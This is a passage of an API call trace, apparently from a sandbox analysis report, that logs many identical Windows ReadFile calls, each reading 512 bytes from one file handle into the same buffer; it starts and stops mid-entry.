nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, 
lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, 
lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile 
(in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 
[0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, 
lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, 
lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: 
lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, 
lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, 